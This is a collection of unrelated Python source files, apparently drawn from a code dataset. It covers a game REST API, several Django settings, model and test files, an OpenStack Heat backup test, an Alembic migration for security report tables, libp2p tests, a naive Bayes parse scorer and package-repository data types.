return (200, json.dumps(out))
def esta_acabado(self, request):
""" Comprueba si la partida esta acabada.
---
Devuelve True si la partida esta acabada, sino False.
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, True o False) comprobación correcta.
"""
acabado = self.__partida.esta_acabado()
return (200, json.dumps(acabado))
def obtener_resultado(self, request):
""" Devuelve el resultado obtenido por el jugador.
---
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'Ganador', 'Perdedor' o 'Empate') comprobación correcta.
- (400, 'Bad Request') cuando la partida no esta acabada.
- (401, 'Unauthorized') cuando el token es invalido.
"""
token = request.form['token']
auth = AuthClient.instance()
if not auth.validate_token(token):
return (401, 'Unauthorized')
if not self.__partida.esta_acabado():
return (400, 'Bad Request')
ganador = self.__partida.obtener_ganador()
if ganador is None:
resultado = 'Empate'
elif token == ganador.obtener_token():
resultado = 'Ganador'
else:
resultado = 'Perdedor'
return (200, resultado)
def finalizar_partida(self, request):
""" Finaliza la partide e inicializa otra cuando los dos clientes realizan esta petición.
---
Parametros:
- request: La solicitud HTTP recibida en el REST endpoint.
Returns:
Una tupla con los siguientes valores:
- (200, 'OK') operación correcta.
- (401, 'Unauthorized') cuando el token es invalido.
"""
token = request.form['token']
auth = AuthClient.instance()
if not auth.validate_token(token):
return (401, 'Unauthorized')
if self.__finalizar:
self.__partida = Partida(self.__fabrica_juego)
self.__finalizar = False
else:
ganador = self.__partida.obtener_ganador()
perdedor = self.__partida.obtener_perdedor()
if ganador is not None:
auth.add_score(ganador.obtener_token(), 1, 1, 0)
auth.add_score(perdedor.obtener_token(), -1, 0, 1)
self.__finalizar = True
return (200, 'OK')
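# Illustrative sketch (not part of the original module): one possible way to
# expose the facade through Flask routes. The route paths, the "crear_app"
# helper and the "TresRaya" default are assumptions for the example; the only
# contract relied upon is that each facade method returns a (status, body) tuple.
def crear_app(tipo="TresRaya"):
    app = Flask(__name__)
    api = RestApi(tipo)
    def responder(resultado):
        # Flask accepts a (body, status) tuple, so swap the facade's ordering.
        codigo, cuerpo = resultado
        return cuerpo, codigo
    @app.route("/status", methods=["GET"])
    def status():
        return responder(api.status(request))
    @app.route("/jugador", methods=["POST"])
    def registrar_jugador():
        return responder(api.registrar_jugador(request))
    @app.route("/jugada", methods=["POST"])
    def realizar_jugada():
        return responder(api.realizar_jugada(request))
    return app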
|
py | 7dfa88aea18262d50103b061d7ffedf6d132e3aa | from django.test import TestCase
from django.db import IntegrityError
from nose.tools import raises, assert_equals, assert_is_not_none
from api.models import Concept
from utils import factories
class ConceptTest(TestCase):
def setUp(self):
self.name = 'SX SITE SWELLING'
self.display_name = 'Swelling at surgical site'
def test_concept_required(self):
concept = Concept.objects.create(
name=self.name,
display_name=self.display_name
)
assert_equals(len(concept.uuid.hex), 32)
assert_equals(concept.name, self.name)
assert_equals(concept.display_name, self.display_name)
def test_concepts_all_properties(self):
Concept.objects.create(
name=self.name,
display_name=self.display_name,
description='Swelling observed at surgical site post procedure',
data_type='string',
mime_type='text/plain',
constraint='yes;no'
)
concept = Concept.objects.get(name='SX SITE SWELLING')
assert_equals(len(concept.uuid.hex), 32)
assert_is_not_none(concept.created)
assert_is_not_none(concept.last_modified)
assert_equals(concept.name, self.name)
assert_equals(concept.display_name, self.display_name)
assert_equals(concept.description, 'Swelling observed at surgical site post procedure')
assert_equals(concept.data_type, 'string')
assert_equals(concept.mime_type, 'text/plain')
assert_equals(concept.constraint, 'yes;no')
@raises(IntegrityError)
def test_concept_type_invalid(self):
Concept.objects.create(
name=self.name,
display_name=self.display_name,
data_type='bad'
)
def test_data_type_string(self):
self.assert_data_type_valid('string')
def test_data_type_boolean(self):
self.assert_data_type_valid('boolean')
def test_data_type_number(self):
self.assert_data_type_valid('number')
def test_data_type_complex(self):
self.assert_data_type_valid('complex')
# HELPERS
def assert_data_type_valid(self, data_type):
concept = factories.ConceptFactory(
data_type=data_type
)
assert_is_not_none(concept)
|
py | 7dfa896fdfa24c3d5669827df44bfb0f6bd79007 | # -*- coding: utf-8 -*-
"""
Django settings for pkg project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (pkg/config/settings/common.py - 3 = pkg/)
APPS_DIR = ROOT_DIR.path('pkg')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
# Apps specific for this project go here.
LOCAL_APPS = (
'pkg.users', # custom users app
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'pkg.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool('DJANGO_DEBUG', False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""brett quada""", '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db('DATABASE_URL', default='postgres://postgres:brett@localhost/pkg'),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Denver'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)
ACCOUNT_ADAPTER = 'pkg.users.adapters.AccountAdapter'
SOCIALACCOUNT_ADAPTER = 'pkg.users.adapters.SocialAccountAdapter'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# Location of root django.contrib.admin URL, use {% url 'admin:index' %}
ADMIN_URL = r'^admin/'
# Your common stuff: Below this line define 3rd party library settings
|
py | 7dfa8bf6867e0562193b5ae29ae8a398f3c56e6f | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from cinderclient import exceptions as cinder_exceptions
from oslo_log import log as logging
import six
from tempest.lib import decorators
from heat_tempest_plugin.common import exceptions
from heat_tempest_plugin.common import test
from heat_tempest_plugin.tests.scenario import scenario_base
LOG = logging.getLogger(__name__)
@test.requires_service_feature('volume', 'backup')
class VolumeBackupRestoreIntegrationTest(scenario_base.ScenarioTestsBase):
"""Class is responsible for testing of volume backup."""
def setUp(self):
super(VolumeBackupRestoreIntegrationTest, self).setUp()
self.volume_description = 'A test volume description 123'
self.volume_size = self.conf.volume_size
def _cinder_verify(self, volume_id, expected_status='available'):
self.assertIsNotNone(volume_id)
volume = self.volume_client.volumes.get(volume_id)
self.assertIsNotNone(volume)
self.assertEqual(expected_status, volume.status)
self.assertEqual(self.volume_size, volume.size)
self.assertEqual(self.volume_description,
volume.display_description)
def _outputs_verify(self, stack, expected_status='available'):
self.assertEqual(expected_status,
self._stack_output(stack, 'status'))
self.assertEqual(six.text_type(self.volume_size),
self._stack_output(stack, 'size'))
self.assertEqual(self.volume_description,
self._stack_output(stack, 'display_description'))
def check_stack(self, stack_id, parameters):
stack = self.client.stacks.get(stack_id)
# Verify with cinder that the volume exists, with matching details
volume_id = self._stack_output(stack, 'volume_id')
self._cinder_verify(volume_id, expected_status='in-use')
# Verify the stack outputs are as expected
self._outputs_verify(stack, expected_status='in-use')
# Delete the stack and ensure a backup is created for volume_id
# but the volume itself is gone
self._stack_delete(stack_id)
self.assertRaises(cinder_exceptions.NotFound,
self.volume_client.volumes.get,
volume_id)
backups = self.volume_client.backups.list()
self.assertIsNotNone(backups)
backups_filtered = [b for b in backups if b.volume_id == volume_id]
self.assertEqual(1, len(backups_filtered))
backup = backups_filtered[0]
self.addCleanup(self.volume_client.backups.delete, backup.id)
# Now, we create another stack where the volume is created from the
# backup created by the previous stack
try:
stack_identifier2 = self.launch_stack(
template_name='test_volumes_create_from_backup.yaml',
parameters=parameters,
add_parameters={'backup_id': backup.id})
stack2 = self.client.stacks.get(stack_identifier2)
except exceptions.StackBuildErrorException:
LOG.exception("Halting test due to bug: #1382300")
return
# Verify with cinder that the volume exists, with matching details
volume_id2 = self._stack_output(stack2, 'volume_id')
self._cinder_verify(volume_id2, expected_status='in-use')
# Verify the stack outputs are as expected
self._outputs_verify(stack2, expected_status='in-use')
testfile_data = self._stack_output(stack2, 'testfile_data')
self.assertEqual('{"instance1": "Volume Data:ateststring"}',
testfile_data)
# Delete the stack and ensure the volume is gone
self._stack_delete(stack_identifier2)
self.assertRaises(cinder_exceptions.NotFound,
self.volume_client.volumes.get,
volume_id2)
@decorators.idempotent_id('c3416735-87bf-4478-85c5-b3823819eb19')
def test_cinder_volume_create_backup_restore(self):
"""Ensure the 'Snapshot' deletion policy works.
This requires a more complex test, but it tests several aspects
of the heat cinder resources:
1. Create a volume, attach it to an instance, write some data to it
2. Delete the stack, with 'Snapshot' specified, creates a backup
3. Check the snapshot has created a volume backup
4. Create a new stack, where the volume is created from the backup
5. Verify the test data written in (1) is present in the new volume
"""
parameters = {
'key_name': self.keypair_name,
'instance_type': self.conf.minimal_instance_type,
'image_id': self.conf.minimal_image_ref,
'volume_description': self.volume_description,
'timeout': self.conf.build_timeout,
'network': self.net['id']
}
# Launch stack
stack_id = self.launch_stack(
template_name='test_volumes_delete_snapshot.yaml',
parameters=parameters,
add_parameters={'volume_size': self.volume_size}
)
# Check stack
self.check_stack(stack_id, parameters)
|
py | 7dfa8cdacde0b194f51088013c19487cf0ef5e04 | from django.conf import settings
from django.db import models
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from mptt.models import MPTTModel, TreeForeignKey
class Category(MPTTModel):
"""
    Category table implemented with MPTT.
"""
name = models.CharField(
verbose_name=_("Category Name"),
help_text=_("Required and unique"),
max_length=255,
unique=True,
)
slug = models.SlugField(verbose_name=_("Category safe URL"), max_length=255, unique=True)
parent = TreeForeignKey("self", on_delete=models.CASCADE, null=True, blank=True, related_name="children")
is_active = models.BooleanField(default=True)
class MPTTMeta:
order_insertion_by = ["name"]
class Meta:
verbose_name = _("Category")
verbose_name_plural = _("Categories")
def get_absolute_url(self):
return reverse("store:category_list", args=[self.slug])
def __str__(self):
return self.name
class ProductType(models.Model):
"""
ProductType Table will provide a list of the different types
of products that are for sale.
"""
name = models.CharField(verbose_name=_("Product Name"), help_text=_("Required"), max_length=255, unique=True)
is_active = models.BooleanField(default=True)
class Meta:
verbose_name = _("Product Type")
verbose_name_plural = _("Product Types")
def __str__(self):
return self.name
class ProductSpecification(models.Model):
"""
    The Product Specification table contains product
    specifications or features for the product types.
"""
product_type = models.ForeignKey(ProductType, on_delete=models.RESTRICT)
name = models.CharField(verbose_name=_("Name"), help_text=_("Required"), max_length=255)
class Meta:
verbose_name = _("Product Specification")
verbose_name_plural = _("Product Specifications")
def __str__(self):
return self.name
class Product(models.Model):
"""
    The Product table containing all product items.
"""
can_backorder = models.BooleanField(default=False)
product_type = models.ForeignKey(ProductType, on_delete=models.RESTRICT)
category = models.ForeignKey(Category, on_delete=models.RESTRICT)
title = models.CharField(
verbose_name=_("title"),
help_text=_("Required"),
max_length=255,
)
    description = models.TextField(verbose_name=_("Description"), help_text=_("Not Required"), blank=True)
slug = models.SlugField(max_length=255)
regular_price = models.DecimalField(
verbose_name=_("Precio"),
help_text=_("Máximo 999.99"),
error_messages={
"name": {
"max_length": _("El precio debe estar entre 0 y 999.99."),
},
},
max_digits=5,
decimal_places=2,
)
inventory = models.IntegerField(default=0)
is_active = models.BooleanField(
verbose_name=_("Product visibility"),
help_text=_("Change product visibility"),
default=True,
)
featured = models.BooleanField(default=False)
created_at = models.DateTimeField(_("Created at"), auto_now_add=True, editable=False)
updated_at = models.DateTimeField(_("Updated at"), auto_now=True)
users_wishlist = models.ManyToManyField(settings.AUTH_USER_MODEL, related_name="user_wishlist", blank=True)
def remove_items_from_inventory(self, count=1, save=True):
current_inv = self.inventory
current_inv -= count
self.inventory = current_inv
        if save:
self.save()
return self.inventory
class Meta:
ordering = ("-created_at",)
verbose_name = _("Product")
verbose_name_plural = _("Products")
def get_absolute_url(self):
return reverse("store:product_detail", args=[self.slug])
def __str__(self):
return self.title
class ProductSpecificationValue(models.Model):
"""
    The Product Specification Value table holds each
    product's individual specification or bespoke features.
"""
product = models.ForeignKey(Product, on_delete=models.CASCADE)
specification = models.ForeignKey(ProductSpecification, on_delete=models.RESTRICT)
value = models.CharField(
verbose_name=_("Valor"),
help_text=_("Tipo de Producto"),
max_length=255,
)
class Meta:
verbose_name = _("Tipo de Producto")
verbose_name_plural = _("Tipos de Producto")
def __str__(self):
return self.value
class ProductImage(models.Model):
"""
The Product Image table.
"""
product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name="product_image")
image = models.ImageField(upload_to='productos')
is_feature = models.BooleanField(default=False)
created_at = models.DateTimeField(auto_now_add=True, editable=False)
updated_at = models.DateTimeField(auto_now=True)
class Meta:
verbose_name = _("Imagen del Producto")
verbose_name_plural = _("Imagenes del Producto")
|
py | 7dfa8d1118e0fe11cc018ca3f3c84c3411a3a012 | """Create security tables
Revision ID: 85d881a256c0
Revises: 5818f4679595
Create Date: 2021-09-15 19:13:38.286350
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "85d881a256c0"
down_revision = "5818f4679595"
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"security_reports",
sa.Column("id", postgresql.UUID(as_uuid=True), primary_key=True),
sa.Column("scan_id", postgresql.UUID(as_uuid=True), nullable=False),
sa.Column("product", sa.String(), nullable=False),
sa.Column("revision", sa.String(), nullable=False),
sa.Column("url", sa.String()),
sa.Column("ci", sa.Boolean, unique=False, default=False),
sa.Column("summary", postgresql.JSONB(), nullable=False),
sa.Column("created_at", sa.DateTime, default=sa.func.utc_timestamp()),
sa.Column("updated_at", sa.DateTime, onupdate=sa.func.utc_timestamp()),
sa.ForeignKeyConstraint(
["scan_id"],
["scans.id"],
),
)
op.create_table(
"security_violations",
sa.Column("id", postgresql.UUID(as_uuid=True), primary_key=True),
sa.Column("security_report_id", postgresql.UUID(as_uuid=True), nullable=False),
sa.Column("violation", sa.String(), nullable=False),
sa.Column("risk", sa.String(), nullable=False),
sa.Column("confidence", sa.String(), nullable=False),
sa.Column("solution", sa.Text()),
sa.Column("reference", sa.Text()),
sa.Column("target", sa.Text()),
sa.Column("data", postgresql.JSONB(), nullable=False),
sa.Column("tags", postgresql.JSONB(), nullable=False),
sa.Column("message", sa.Text()),
sa.Column("url", sa.String()),
sa.Column("created_at", sa.DateTime, default=sa.func.utc_timestamp()),
sa.Column("updated_at", sa.DateTime, onupdate=sa.func.utc_timestamp()),
sa.ForeignKeyConstraint(
["security_report_id"],
["security_reports.id"],
),
)
def downgrade():
op.drop_table("security_violations")
op.drop_table("security_reports")
|
py | 7dfa8dd86c3795e61bdca5e9a316d5e1dc9aef51 | import numpy as np
from . import base
class Stack(base.Reduction):
"""
Stack the features from multiple inputs.
All input matrices have to be of the same length (same number of frames).
"""
def compute(self, chunk, sampling_rate, corpus=None, utterance=None):
return np.hstack(chunk.data)
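# Illustrative sketch (not part of the original module): the same horizontal
# stacking that Stack.compute() applies to chunk.data, shown with two made-up
# per-frame feature matrices of 3 frames each.
if __name__ == '__main__':
    mfcc = np.random.rand(3, 4)    # 3 frames, 4 coefficients
    pitch = np.random.rand(3, 2)   # 3 frames, 2 values
    stacked = np.hstack([mfcc, pitch])
    print(stacked.shape)           # -> (3, 6)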
|
py | 7dfa8e43b7e2ce3227954c96d3b90bc44c711c89 | import pytest
import os
import glob
BASE_DIR = os.path.dirname(__file__)
def generate_test(filename: str):
@pytest.fixture()
def response():
return filename
return response
all_validation = [
]
for f in glob.glob(os.path.join(BASE_DIR, "*")):
_, name = f.rsplit("/", 1)
if not os.path.isfile(f):
continue
if not f.endswith("input.ll"):
continue
name = "validation_"+name.replace("-", "_").replace(".", "_")
locals()[name] = generate_test(f)
all_validation.append(name)
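# Illustrative sketch (an assumption, not part of the original module): a test
# that consumes the generated fixtures by name via request.getfixturevalue().
@pytest.mark.parametrize("fixture_name", all_validation)
def test_validation_inputs_exist(fixture_name, request):
    path = request.getfixturevalue(fixture_name)
    # Each generated fixture simply returns the path of its *input.ll file.
    assert path.endswith("input.ll")
    assert os.path.isfile(path)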
|
py | 7dfa8e7fa468fdf2c07eb2cab4ea7f28f7174da4 | import pytest
from libp2p.host.exceptions import ConnectionFailure
from libp2p.peer.peerinfo import PeerInfo
from libp2p.tools.factories import HostFactory, RoutedHostFactory
@pytest.mark.trio
async def test_host_routing_success():
async with RoutedHostFactory.create_batch_and_listen(2) as hosts:
# forces to use routing as no addrs are provided
await hosts[0].connect(PeerInfo(hosts[1].get_id(), []))
await hosts[1].connect(PeerInfo(hosts[0].get_id(), []))
@pytest.mark.trio
async def test_host_routing_fail():
async with RoutedHostFactory.create_batch_and_listen(
2
) as routed_hosts, HostFactory.create_batch_and_listen(1) as basic_hosts:
# routing fails because host_c does not use routing
with pytest.raises(ConnectionFailure):
await routed_hosts[0].connect(PeerInfo(basic_hosts[0].get_id(), []))
with pytest.raises(ConnectionFailure):
await routed_hosts[1].connect(PeerInfo(basic_hosts[0].get_id(), []))
|
py | 7dfa8f247ee1fa0c67adc42f04f2bc3fb839cbb8 | """Test Pure Python functionality"""
import sys
import nose
import warnings
from nose_exclude import NoseExclude
warnings.filterwarnings("ignore", category=DeprecationWarning)
if __name__ == "__main__":
argv = sys.argv[:]
argv.extend([
        # Sometimes, files from Windows accessed
        # from Linux end up with the executable flag
        # set, and Nose has an aversion to these
        # by default.
"--exe",
"--verbose",
"--with-doctest",
"--exclude-dir=avalon/maya",
"--exclude-dir=avalon/nuke",
"--exclude-dir=avalon/houdini",
# We can expect any vendors to
# be well tested beforehand.
"--exclude-dir=avalon/vendor",
])
nose.main(argv=argv,
addplugins=[NoseExclude()])
|
py | 7dfa8f4e3ae35a6198f6637606e98f10bd9f2903 | # Copyright 2018-2020 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import streamlit as st
import numpy as np
img = np.repeat(0, 10000).reshape(100, 100)
st.image(img, caption="Black Square")
|
py | 7dfa8fa76b8c5b2cf6442a77a666a1dd58d6136a | """This module cointains the implementation of the scorer based on naive bayes."""
import bz2
import math
import pickle
from datetime import datetime
from typing import Sequence
from timenlp.nb_estimator import MultinomialNaiveBayes
from timenlp.count_vectorizer import CountVectorizer
from timenlp.pipeline import TimeNLPPipeline
from .scorer import Scorer
from .partial_parse import PartialParse
from .types import Artifact
class NaiveBayesScorer(Scorer):
def __init__(self, nb_model: TimeNLPPipeline) -> None:
"""Scorer based on a naive bayes estimator.
This scorer models the probability of having a correct parse, conditioned
on the sequence of rules (expressed as a categorical feature) that led to
that parse.
The score is also modified by a "length" factor that penalizes parses that
cover a smaller part of the text string.
:param nb_model:
A scikit-learn style Estimator that was trained on a corpus that takes
a Sequence[Sequence[str]] as X (each entry is a sequence of rule
identifiers) and a Sequence[int] in the set {-1, 1} that indicates if
the parse was correct or incorrect.
"""
self._model = nb_model
@classmethod
def from_model_file(cls, fname: str) -> "NaiveBayesScorer":
with bz2.open(fname, "rb") as fd:
return cls(pickle.load(fd))
def score(self, txt: str, ts: datetime, partial_parse: PartialParse) -> float:
# Penalty for partial matches
max_covered_chars = partial_parse.prod[-1].mend - partial_parse.prod[0].mstart
len_score = math.log(max_covered_chars / len(txt))
X = _feature_extractor(txt, ts, partial_parse)
pred = self._model.predict_log_proba([X])
# NOTE: the prediction is log-odds, or logit
model_score = pred[0][1] - pred[0][0]
return model_score + len_score
def score_final(
self, txt: str, ts: datetime, partial_parse: PartialParse, prod: Artifact
) -> float:
# The difference between the original score and final score is that in the
# final score, the len_score is calculated based on the length of the final
# production
len_score = math.log(len(prod) / len(txt))
X = _feature_extractor(txt, ts, partial_parse)
pred = self._model.predict_log_proba([X])
# NOTE: the prediction is log-odds, or logit
model_score = pred[0][1] - pred[0][0]
# We want the len_score to always take precedence. I believe a logit won't go up
# more than 1000. A better way would be to return an ordering tuple instead,
# but then we would need to change many interfaces.
return model_score + 1000 * len_score
def _feature_extractor(
txt: str, ts: datetime, partial_parse: PartialParse
) -> Sequence[str]:
return [str(r) for r in partial_parse.rules]
def train_naive_bayes(X: Sequence[Sequence[str]], y: Sequence[bool]) -> TimeNLPPipeline:
"""Train a naive bayes model for NaiveBayesScorer"""
y_binary = [1 if y_i else -1 for y_i in y]
# Create and train the pipeline
pipeline = TimeNLPPipeline(
CountVectorizer(ngram_range=(1, 3)), MultinomialNaiveBayes(alpha=1.0)
)
model = pipeline.fit(X, y_binary)
return model
def save_naive_bayes(model: TimeNLPPipeline, fname: str) -> None:
"""Save a naive bayes model for NaiveBayesScorer"""
# TODO: version this model and dump metadata with lots of information
with bz2.open(fname, "wb") as fd:
pickle.dump(model, fd)
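# Illustrative sketch (not part of the original module): training a model from
# labelled rule sequences and wiring it into the scorer. The rule names, the
# tiny corpus and the output file name are made up for the example.
if __name__ == '__main__':
    X = [['ruleAbsDate', 'ruleDOM'], ['ruleAbsDate'], ['ruleDOM', 'ruleTime']]
    y = [True, False, True]
    model = train_naive_bayes(X, y)
    save_naive_bayes(model, '/tmp/timenlp_nb.pbz')
    scorer = NaiveBayesScorer.from_model_file('/tmp/timenlp_nb.pbz')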
|
py | 7dfa9038c491bfe3e937b206ea6b510a6d2c4341 | from abc import abstractmethod
from enum import Enum, auto
import functools
import hashlib
import importlib
import os
import pkgutil
import traceback
from typing import Callable, Dict, List, Tuple, Iterable, TypeVar, Type, Optional
import inspect
from pydantic import BaseModel
from pywharf_core.utils import (
read_toml,
write_toml,
normalize_distribution_name,
now_timestamp,
update_hash_algo_with_file,
)
####################
# Static I/O types #
####################
class LocalPaths(BaseModel):
index: str
log: str
lock: str
job: str
cache: str
def makedirs(self):
os.makedirs(self.index, exist_ok=True)
os.makedirs(self.log, exist_ok=True)
os.makedirs(self.lock, exist_ok=True)
os.makedirs(self.job, exist_ok=True)
os.makedirs(self.cache, exist_ok=True)
class UploadPackageStatus(Enum):
SUCCEEDED = auto()
CONFLICT = auto()
BAD_REQUEST = auto()
class UploadPackageResult(BaseModel):
status: UploadPackageStatus
message: str = ''
class UploadPackageContext(BaseModel):
filename: str
path: str
meta: Dict[str, str] = {}
failed: bool = False
message: str = ''
def __init__(self, **data):
super().__init__(**data)
# Fill distribution name.
if not self.meta.get('distrib'):
name = self.meta.get('name')
if name:
self.meta['distrib'] = normalize_distribution_name(name)
else:
self.failed = True
self.message = 'Cannot generate the distribution name.'
assert self.meta_distrib
# SHA256 checksum, also suggested by PEP-503.
if not self.meta.get('sha256'):
sha256_algo = hashlib.sha256()
update_hash_algo_with_file(self.path, sha256_algo)
self.meta['sha256'] = sha256_algo.hexdigest()
assert self.meta_sha256
@property
def meta_distrib(self) -> str:
return self.meta['distrib']
@property
def meta_sha256(self) -> str:
return self.meta['sha256']
class UploadIndexStatus(Enum):
SUCCEEDED = auto()
FAILED = auto()
class UploadIndexResult(BaseModel):
status: UploadIndexStatus
message: str = ''
class DownloadIndexStatus(Enum):
SUCCEEDED = auto()
FAILED = auto()
class DownloadIndexResult(BaseModel):
status: DownloadIndexStatus
message: str = ''
####################################
# Interfaces of package repository #
####################################
class PkgRepoConfig(BaseModel):
type: str
name: str
max_file_bytes: int = 1024**3
sync_index_interval: int = 60
class PkgRepoSecret(BaseModel):
type: str
name: str
raw: str
def secret_hash(self) -> str:
sha256_algo = hashlib.sha256()
sha256_algo.update(self.raw.encode())
return f'{self.name}-{sha256_algo.hexdigest()}'
class PkgRef(BaseModel):
type: str
distrib: str
package: str
ext: str
sha256: str
meta: Dict[str, str]
@abstractmethod
def auth_url(self, config: PkgRepoConfig, secret: PkgRepoSecret) -> str:
pass
